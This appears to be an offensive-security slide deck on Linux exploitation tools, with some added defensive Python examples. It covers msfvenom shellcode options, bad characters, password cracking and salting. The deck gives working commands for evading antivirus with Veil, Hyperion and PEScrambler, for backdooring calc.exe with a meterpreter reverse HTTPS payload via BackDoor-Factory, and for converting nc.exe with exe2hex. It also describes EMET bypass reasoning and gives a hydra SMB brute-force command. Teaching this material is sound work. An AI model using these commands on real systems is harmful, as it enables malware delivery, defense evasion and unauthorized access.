Linux Exploitation Tools
1LT George Raileanu
Linux Exploitation Tools
Shellcode: a piece of code used as the payload in the exploitation of a software vulnerability.
What is a payload? What is an exploit? What is a vulnerability?
Reference: Linux Exploitation Tools
Types of Shellcode: Local, Remote, Staged
Kali Linux
What is Kali Linux? Over 300 programs, including:
Nmap, Aircrack-ng, Kismet, Wireshark, Metasploit, Burp, John the Ripper, Maltego, Armitage, OWASP ZAP
Reference: Kali Linux
Metasploit
[slide image: meme; reference: http://www. quickmeme]
[slide image: meme; https://memegenerator.net/instance/50927099]
Using msfvenom to generate our shellcode:
-f c                     (format: C / Windows)
-a x86                   (32-bit OS)
-a x86_64                (64-bit OS)
-b "\x00\x0a\x0d\x20"    (exclude bad chars)
-e x86/shikata_ga_nai    (encode the payload)
Bad characters:
0x00 == NULL byte: NULL bytes cause a strcpy operation to terminate, which can truncate our buffer and ignore our shellcode.
0x0D == Carriage return: would signify the end of the PASSWORD field, and terminate the buffer at that point.
0x0A == Line feed: same reason as the carriage return.
0x20 == Space
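The NUL-byte point above is worth seeing rather than taking on faith. The following Python example (added here, not part of the slide deck) uses ctypes to mirror C string semantics: a buffer's .raw keeps every byte, while .value stops at the first NUL exactly as strcpy or strlen would, so anything after the NUL is silently dropped. The byte string SAMPLE is constructed for the demonstration and is not shellcode; the helper names are this example's own.

```python
import ctypes

# Bad bytes listed on the slide: NUL, LF, CR, space.
BAD_CHARS = b"\x00\x0a\x0d\x20"

# Constructed sample bytes (not real shellcode): a NUL at offset 4 and a CR at offset 6.
SAMPLE = b"\x90\x90\x31\xc0\x00\x41\x0d\x42\x43"


def find_bad_chars(data: bytes, bad: bytes = BAD_CHARS):
    """Return (offset, value) for every byte of data that is in the bad set."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def as_c_string(data: bytes) -> bytes:
    """Return the bytes a C string routine such as strcpy/strlen would see.

    ctypes reproduces the C rule: .raw holds every byte of the array,
    .value stops at the first NUL (or the end of the array if there is none).
    """
    buf = ctypes.create_string_buffer(data, len(data))
    return buf.value


def survives_c_copy(data: bytes) -> bool:
    """True only if nothing is lost when the buffer is handled as a NUL-terminated string."""
    return as_c_string(data) == data


if __name__ == "__main__":
    print("bad bytes (offset, value):", find_bad_chars(SAMPLE))
    print("after a strcpy-style copy:", as_c_string(SAMPLE))
    print("buffer intact:", survives_c_copy(SAMPLE))
```

The truncation is the reason the slide lists 0x00 first: a payload that passes through any C string function is cut at the first NUL, which is also why defensive code that copies untrusted input should use length-bounded operations (memcpy with an explicit size, strncpy with a checked length) rather than relying on a terminator the input may not contain.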
Using EXITFUNC=thread, we keep the system or service we exploited from crashing upon exit from our shell.
Exploit Obfuscation SAFE
Veil Evasion Framework:
../veil-evasion/hyperion# wine hyperion.exe filein.exe fileout.exe
../veil-evasion/hyperion# mv fileout.exe ../pescrambler/ && cd ../pescrambler/
../veil-evasion/pescrambler# wine PEScrambler.exe -i fileout.exe -o final.exe
BackDoor-Factory:
../backdoor-factory/# ./backdoor.py -f calc.exe -s meterpreter_reverse_https_threaded -H <LHOST> -P <LPORT>
# If encountered, never use a cave section named 'None'; if no caves are adequate, use 'a' to append the backdoor to the binary.
But with all the mitigations and prevention mechanisms installed on Win* OSs, why would this work?
EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a case-by-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations. However, while EMET provides support for both 32- and 64-bit processes, as a limitation of its design it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET's mitigations. Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations.
EXE2HEX:
../exe2hex/# python3 exe2hex.py -x /tmp/safe.exe
../exe2hex/# ./exe2hex.py -x /tmp/nc.exe -b /tmp/safe.txt
../exe2hex/# cat /tmp/calc.exe | python3 exe2hex.py -s -b safe.bat -p safe.cmd
Methods/OS Support
• DEBUG.exe (BATch mode, -b)
◦ Every version of Windows x86 (no x64 support).
◦ Useful for legacy versions of Windows (e.g. XP/2000).
◦ Limitation of 64k file size for binary files.
• PowerShell (PoSh mode, -p)
◦ Supports both Windows x86 & x64.
◦ Aimed at more "recent" versions of Windows.
◦ PowerShell was first integrated into the core OS with Windows 7/Windows Server 2008 R2.
◦ Windows XP SP2, Windows Server 2003 & Windows Vista require PowerShell to be pre-installed.
◦ This is not a .ps1 file (pure PowerShell). It only calls PowerShell at the end to convert.
Password Cracking: Obtain encrypted/hashed passwords, and guess, decrypt, or compare on an offline system. Usually much faster than password guessing.
Password Guessing: Attempts to actually log in to the target system. Likely generates a lot of traffic and logs, and likely to lock out the attempted user account(s). Much slower than password cracking.
Rainbow Tables:
Reference:
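The "traffic and logs" property of password guessing is exactly what a defender keys on. The following Python example (added here, not part of the slides) runs a simple sliding-window detector over constructed sshd-style log lines: a source IP that accumulates a threshold of failed logins inside a short window, typically across several usernames, is flagged. The log lines, timestamp format, threshold and window are this example's own assumptions; the same logic applies to any authentication log (SMB, web login, VPN) once the failure lines are parsed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (sshd-style lines with ISO timestamps; not real data).
# 10.0.0.5 tries six logins across five accounts in 15 seconds;
# 192.168.1.20 has two ordinary failures minutes apart.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[1001]: Failed password for invalid user admin from 10.0.0.5 port 40001 ssh2
2024-05-01T10:00:04 sshd[1001]: Failed password for root from 10.0.0.5 port 40002 ssh2
2024-05-01T10:00:07 sshd[1001]: Failed password for invalid user test from 10.0.0.5 port 40003 ssh2
2024-05-01T10:00:09 sshd[1001]: Failed password for invalid user guest from 10.0.0.5 port 40004 ssh2
2024-05-01T10:00:12 sshd[1001]: Failed password for invalid user oracle from 10.0.0.5 port 40005 ssh2
2024-05-01T10:00:15 sshd[1001]: Failed password for root from 10.0.0.5 port 40006 ssh2
2024-05-01T10:00:20 sshd[1002]: Accepted password for bob from 192.168.1.30 port 50000 ssh2
2024-05-01T10:03:00 sshd[1003]: Failed password for alice from 192.168.1.20 port 51000 ssh2
2024-05-01T10:09:30 sshd[1004]: Failed password for alice from 192.168.1.20 port 51001 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) "
)


def parse_failures(lines):
    """Yield (timestamp, source_ip, username) for every failed-login line."""
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["ip"], m["user"]


def detect_guessing(lines, threshold=5, window_s=60):
    """Flag source IPs with >= threshold failures inside any window_s-second window.

    Returns {ip: {"first": iso_ts, "count": n, "users": [...]}} holding the
    largest in-window count seen for that IP and every username it tried.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)      # ip -> distinct usernames attempted
    alerts = {}
    for ts, ip, user in sorted(parse_failures(lines)):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_s:   # slide the window forward
            q.popleft()
        if len(q) >= threshold and len(q) > alerts.get(ip, {}).get("count", 0):
            alerts[ip] = {"first": q[0].isoformat(), "count": len(q),
                          "users": sorted(users[ip])}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_guessing(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['count']} failures since {info['first']}, "
              f"users tried: {info['users']}")
```

The two slow failures from 192.168.1.20 never reach the threshold inside one window, so a user mistyping a password is not flagged, while the burst from 10.0.0.5 is. The distinct-user list is the useful second signal: one account with many failures looks like a forgotten password, many accounts from one source looks like a wordlist.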
Salt
Edit the password hashing algorithm used in Linux:
$ nano /etc/pam.d/common-password
We can change it to sha256, sha512, etc.
$ openssl passwd -1 -salt ABCD1234 password
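To show what the salt on this slide (and the rainbow-table item on the previous one) actually buys, here is a Python example added for this page; it is not the slides' own code and does not reproduce crypt(3)'s $1$/$6$ output format. It hashes a password with PBKDF2-HMAC-SHA512 and a per-user salt, verifies in constant time, and then shows a small precomputed lookup table (a stand-in for a rainbow table) succeeding against an unsalted hash and failing against a salted one. The storage format, the ITERATIONS value, the fixed salt ABCD1234 taken from the slide's command, and the four table entries are this example's constructed assumptions.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Optional

ITERATIONS = 210_000  # PBKDF2-HMAC-SHA512 work factor; raise as hardware gets faster


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Hash a password with a per-user salt.

    Output is '$pbkdf2-sha512$<iterations>$<salt b64>$<hash b64>', a self-describing
    format constructed for this example (not the $6$ crypt format PAM writes).
    A fresh random salt is generated unless one is supplied (e.g. to show determinism).
    """
    if salt is None:
        salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return "$pbkdf2-sha512$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash from the stored salt and compare in constant time."""
    try:
        _, scheme, iterations, salt_b64, hash_b64 = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2-sha512":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


# Stand-in for a precomputed (rainbow) table: unsalted SHA-512 of a few common passwords.
LOOKUP_TABLE = {hashlib.sha512(w.encode()).hexdigest(): w
                for w in ("123456", "password", "qwerty", "letmein")}


def lookup_unsalted(hash_hex: str) -> Optional[str]:
    """Reverse a hash only if it was computed without a salt and is in the table."""
    return LOOKUP_TABLE.get(hash_hex)


def salted_sha512_hex(password: str, salt: bytes) -> str:
    """Plain salted SHA-512 (no stretching), used only to show the table lookup failing."""
    return hashlib.sha512(salt + password.encode()).hexdigest()


if __name__ == "__main__":
    fixed = hash_password("password", salt=b"ABCD1234")
    fresh = hash_password("password")  # random salt: a different string for the same password
    print("same password, different salts, equal strings?", fixed == fresh)
    print("verify correct / wrong:", verify_password("password", fixed),
          verify_password("Password", fixed))
    print("table hit on unsalted hash:", lookup_unsalted(hashlib.sha512(b"password").hexdigest()))
    print("table hit on salted hash:", lookup_unsalted(salted_sha512_hex("password", b"ABCD1234")))
```

The slide's openssl command with a fixed salt is fine for seeing the format, but production hashes must use a random salt per account: with a shared or predictable salt a table can be rebuilt once and reused against every user, which is the attack the salt exists to prevent.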
hydra -L users.txt -P passwords.txt -v -o out 192.168.217.192 smb